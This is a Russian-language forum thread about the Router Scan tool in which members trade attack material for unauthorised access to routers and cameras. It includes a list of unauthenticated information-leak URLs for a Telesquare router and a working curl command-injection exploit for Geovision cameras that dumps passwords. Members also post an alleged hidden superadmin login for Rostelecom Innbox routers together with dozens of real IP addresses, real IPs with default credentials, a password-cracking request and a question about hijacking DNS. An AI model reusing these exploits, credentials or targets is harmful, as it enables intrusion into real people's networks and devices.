прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. C0D3BR34K3R

    C0D3BR34K3R New Member

    Joined:
    1 Jun 2015
    Messages:
    22
    Likes Received:
    3
    Reputations:
    0
    отдельно, можете описать этот эксплоит?
     
  2. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    942
    Likes Received:
    1,052
    Reputations:
    8
  3. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    102
    Likes Received:
    97
    Reputations:
    0
    binarymaster,
    Есть TRENDnet TEW-637AP. Ошибка с BSSID.
    NETGEAR DG834G, ESSID не отпарсился.
    Из новых : DIR-524, NETGEAR R7900, CastleNet, Thomson/Technicolor
    Linksys WAP300N WAP610N
    И ещё всякие разные.
    С чего можно начать? На что сейчас время будет?
     
  4. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    192
    Likes Received:
    15
    Reputations:
    0
    Я хотел спросить если абонент роутера Asus скроет свою сеть через роутер скан определиться его ssid?
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Из веб интерфейса роутера SSID ведь никуда не денется.
     
  6. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    эксплойт от 22.12.2017 на роутер Telesquare Router SDT-CS3B1. кажется в роутерскане его еще нет (если внимательно смотрел список устройств).
    на шодане дорк SDT-CS3B1
    правда большинство роутеров в корее. проверял первый попавшийся на запрос "/wifi2g/basic.shtml" и "/cgi-bin/lte.cgi?Command=getModemStatus" . доступ прошел.


    /home.html << Version and status info leak (firmware, device, type, modem, lte)
    /index.html << Version and status info leak (firmware, device, type, modem, lte)
    /nas/smbsrv.shtml << Samba server settings (workgroup, netbios name)
    /nas/ftpsrv.shtml << FTP settings
    /wifi2g/basic.shtml << Wireless settings
    /admin/status.shtml << Access point status info leak
    /internet/wan.shtml << WAN settings info leak (wanip, subnet, gateway, macaddr, lteipaddr, dns)
    /internet/lan.shtml << LAN settings info leak (dhcpip, lanip, macaddr, gateway, subnet, dns)
    /admin/statistic.shtml << System statistics info leak
    /admin/management.shtml << System management (account settings, ntp settings, ddns settings)
    /serial/serial_direct.shtml << Direct serial settings (network connection settings, serverip, port)
    /admin/system_command.shtml << System command interface
    /internet/dhcpcliinfo.shtml << DHCP Clients info leak (hostname, macaddr, ipaddr)
    /admin/upload_firmware.shtml << Router firmware and lte firmware upgrade
    /firewall/vpn_futuresystem.shtml << VPN settings (udp packet transfer, icmp check)
    /cgi-bin/lte.cgi?Command=getUiccState << GetUiccState()
    /cgi-bin/lte.cgi?Command=getModemStatus << Modem status info leak
    /cgi-bin/systemutil.cgi?Command=SystemInfo << System info leak
    может он не особо распространен.не знаю. но надеюсь, что для поддержки популяции парка устройств может пригодится. а нет-так хоть поразвлекаются любители самообразования :) коррея вроде не сша. больно бить не будут ;):)
     
    Kakoluk, binarymaster and to.Index like this.
  7. waere

    waere New Member

    Joined:
    17 Jan 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Тоже заинтересовался. Куда копать хотя бы?
     
  8. Gashek

    Gashek Well-Known Member

    Joined:
    16 Feb 2017
    Messages:
    220
    Likes Received:
    742
    Reputations:
    13
    хорош беспределить с подменной днс, уже 2 соседям ростелекомовские возвращал
     
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    в догонку к первому посту :)...
    эксплойт на Geovision IP Cam. от 01.02.2018
    уязвимостей много, но на мой взгляд наиболее легко эксплуатируемые

    PoC will create 'tmp/Login.cgi' with '<!--#include file="SYS_CFG"-->', then Dump All Settings, including login and passwords in clear text by accessing the created Login.htm

    curl -v "http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=;echo "<!--#include file="SYS_CFG"-->">tmp/Login.htm;&data_type=1&attachment=1&channel=1&secret=1&key=PWNED" ; curl -v "http://192.168.57.20:80/ssi.cgi/tmp/Login.htm"

    Unathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"

    шодан дорк Geovision

    кому интересно, полное описание и еще куча багов
    https://cxsecurity.com/issue/WLB-2018020023
    может binarymaster с @Felis-Sapiens (если посчитают нужным и будут иметь свободное время) найдут способ и эту железку добить под роутерскан :)
     
    #5689 sha9, 3 Feb 2018
    Last edited: 4 Feb 2018
  10. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Для ревизий с этим скриптом подходит и старый эксплоит 09 года adminpasswd.cgi.
     
    Kakoluk and binarymaster like this.
  11. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    увы с версией прошивки 4.07 не работает. :( пост бесполезен...
     
  12. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    155
    Likes Received:
    145
    Reputations:
    0
    46.251.7.32:8080 admin:admin какой-то DS-Link (вроде уличные роутеры) определяется как ZTE WebProc и больше инфы нет.
    46.251.56.168 user:user определяется как Dual Band WLAN Access Point на самом деле Cgates R7900-A3 инфу пока не берет.
    46.251.32.95 root:admin определяется AirStation является BUFFALO WHR-HP-GN инфу не берет
    109.172.213.126 admin:admin определяется как httpd а он LB-LINK WRFT-2205-11N-5357-EN-1.0.0
    109.172.196.109:8080 пароль пустой определяется как Seems to be LevelOne Broadband Router
    сам Belkin F6D4230 инфу не получает
    92.246.145.207 user:user определяет как index.htm на самом деле D-Link DSL2740U инфу не вытаскивает
     
    #5692 conar, 4 Feb 2018
    Last edited: 5 Feb 2018
    sha9, hydra, Kakoluk and 2 others like this.
  13. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    155
    Likes Received:
    145
    Reputations:
    0
    5.227.121.84 admin:admin определяется как Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN сам-же Robustel R3000-3P инфу не видит
    5.227.121.12 user:user определяется mobile router сам-же какаято моторола инфу не видит
     
    #5693 conar, 6 Feb 2018
    Last edited: 6 Feb 2018
  14. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    У меня рац-предложение для секции Wireless Networks в RS(может моветон, не знаю):
    - поднатужится, и показать свои отчёты MAC-ов, уязвимых для аудита "pixie dust".
    Естественно, с хотя бы минимальными пруфами(логи), пусть даже и размыленные масками.
    И думаю, сторонние источники(проверенные), будут кстати.:)
     
    sha9 and binarymaster like this.
  15. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    155
    Likes Received:
    145
    Reputations:
    0
    В прошлом году Ростелеком стала ставить новые роутеры InnboxE70 определяется как Alpha_webserv (InnboxE70) Есть дыра. Скрытый администратор. Логин superadmin. Пароль y_8v&MzwRPXL33. Адреса роутеров. (на всякий случай несколько)
    5.228.2.227
    5.228.7.127
    5.228.19.38
    5.228.68.58
    5.228.70.125
    5.228.76.26
    5.228.83.111
    5.228.89.177
    5.228.113.100
    5.228.121.210
    5.228.139.19
    5.228.141.78
    5.228.148.120
    5.228.149.46
    5.228.160.45
    5.228.218.87
    5.228.237.185
    37.204.12.223
    37.204.32.20
    37.204.54.206
    37.204.55.139
    37.204.58.19
    37.204.99.189
    37.204.126.179
    37.204.147.133
    37.204.149.210
    37.204.172.185
    37.204.182.97
    37.204.192.118
    37.204.206.151
    37.204.211.126
    37.204.234.206
    37.204.244.141
    46.242.66.67
    46.242.67.212
    46.242.68.121
    46.242.69.44
    46.242.69.94
    46.242.69.153
    46.242.70.74
    46.242.77.30
    46.242.77.187
    46.242.79.225
     
    #5696 conar, 8 Feb 2018
    Last edited: 8 Feb 2018
    Kakoluk, CRACK211, hydra and 4 others like this.
  16. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    155
    Likes Received:
    145
    Reputations:
    0
    5.228.176.16 без пароля определяется Boa/0.94.14rc21 (Realtek Semiconductor Corp. | WIRELESS ROUTER) инфу не вытаскивает
    37.110.25.108,95.84.228.212 без пароля определяется Boa/0.94.14rc21 (Upvel UR-315BN) инфу не вытаскивает
    37.204.27.250 admin:admin определяется как Boa/0.94.14rc21 сам Sapido GR297n инфу не вытаскивает
     
    hydra likes this.
  17. OldSchool1990

    OldSchool1990 New Member

    Joined:
    5 Nov 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    37.144.147.74 Помогите подобрать пароль. Порт 7547
     
  18. xDillion

    xDillion New Member

    Joined:
    9 Feb 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Извиняюсь заранее за вопрос, который за несколько лет мог здесь уже прозвучать, но он меня очень интересует. Есть ли какой-либо способ менять DNS роутера автоматически, чтобы это делала программа, либо эта, либо еще какая-нибудь? Потому что кроме как писать скрипт на JS под каждый интерфейс ничего в голову не приходит. Или вы знаете о подобных программах, куда можно список запить. Заранее благодарю за ответ.
     
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Смысл? Это TR-069.
    Вот из-за таких, как вы, мы теряем точки доступа и доступ к сетям.

    По-хорошему забанить бы вас, только потом ещё сотня таких же придёт.
     
    BIVelcom, Denny23, sha9 and 11 others like this.
Loading...